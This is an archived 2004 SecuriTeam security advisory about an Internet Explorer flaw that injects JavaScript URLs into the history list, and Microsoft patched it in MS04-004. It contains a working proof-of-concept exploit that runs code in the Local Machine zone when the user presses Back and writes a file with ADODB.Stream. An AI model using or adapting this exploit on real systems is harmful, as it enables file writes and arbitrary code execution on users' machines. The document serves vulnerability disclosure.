[NT] Internet Explorer JavaScript URL Injection in History List

From: SecuriTeam (support_at_securiteam.com)
Date: 02/05/04

Next message: SecuriTeam: "[NT] TYPSoft FTP Server Denial of Service (Empty Username and Password)"

Previous message: SecuriTeam: "[NEWS] Cisco Crafted Layer 2 Frame Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 5 Feb 2004 19:01:07 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Internet Explorer JavaScript URL Injection in History List
------------------------------------------------------------------------

SUMMARY

There is a way to inject a malicious JavaScript URL into the history list
of Internet Explorer that would cause a cross site/zone scripting when the
user clicks on the Back button. An attacker may use this to read arbitrary
cookies/local files and execute programs leading to total system
compromise if IE is run as administrator.

DETAILS

Vulnerable Systems:
* Internet Explorer 6 Service Pack 1
* Internet Explorer 5.5 Service Pack 2
* Internet Explorer 5 Service Pack 4

The technique used is fairly straightforward and relies on the fact that a
Javascript URL is operating in the same domain in which it was applied. A
similar method was described in
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-1026>
CAN-2003-1026 that also allows the injection of URLs into the history list
and forcing the user to use the Back button.

Internet Explorer tries to remove Javascript URLs in the history list but
seems to fail in some situations. One such case is when linking to an
external resource from a Javascript URL with
external.NavigateAndFind('res:','',''), where 'res:' is redirected to the
Local Machine zone. When navigating back the Javascript URL will be
applied over the Local Machine zone.

A sample exploit:
// Andreas Sandblad, 2004-02-03, patched by MS04-004
// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands.
// This demo simply creates a harmless textfile on the desktop.
function payload() {
file = "sandblad.txt";
o = new ActiveXObject("ADODB.Stream");
o.Open();
o.Type=2;
o.Charset="ascii";
o.WriteText("You are vulnerable!");
o.SaveToFile(file, 2);
o.Close();
alert("File "+file+" created on desktop!");
}

// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
if (history.length != len)
payload();
else
return "< title>-< /title>< body
onload=external.NavigateAndFind('res:','','')>";
}

// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}

// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
backbutton();

Patch Availability:
Miscrosoft has issued a patch and it is advisable to download the update.
For more information, visit
<http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS04-004.asp> http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS04-004.asp

ADDITIONAL INFORMATION

The information has been provided by <mailto:sandblad@acc.umu.se> Andreas
Sandblad

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NT] TYPSoft FTP Server Denial of Service (Empty Username and Password)"

Previous message: SecuriTeam: "[NEWS] Cisco Crafted Layer 2 Frame Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Sandblad #12: Inject javascript url in history list (revisited)
... Inject javascript url in history list ... The author has found a way to inject
a javascript url in the history list ... two years ago I publiced the advisory "Sandblad
#4 - Using the backbutton ... Run payload code called from Local Machine zone. ...
(Bugtraq)
[EXPL] Tcpdump Remote Denial of Service Exploit (bgp_update_print)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Build a BGP4 update message with
what you want as payload ... goto bad; \ ... The optarg now points
to ... (Securiteam)
[NT] eSignal Remote Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A remote buffer overflow condition
exists in eSignal due to invalid bounds ... payload and all lower-case characters
are converted to upper case. ... (Securiteam)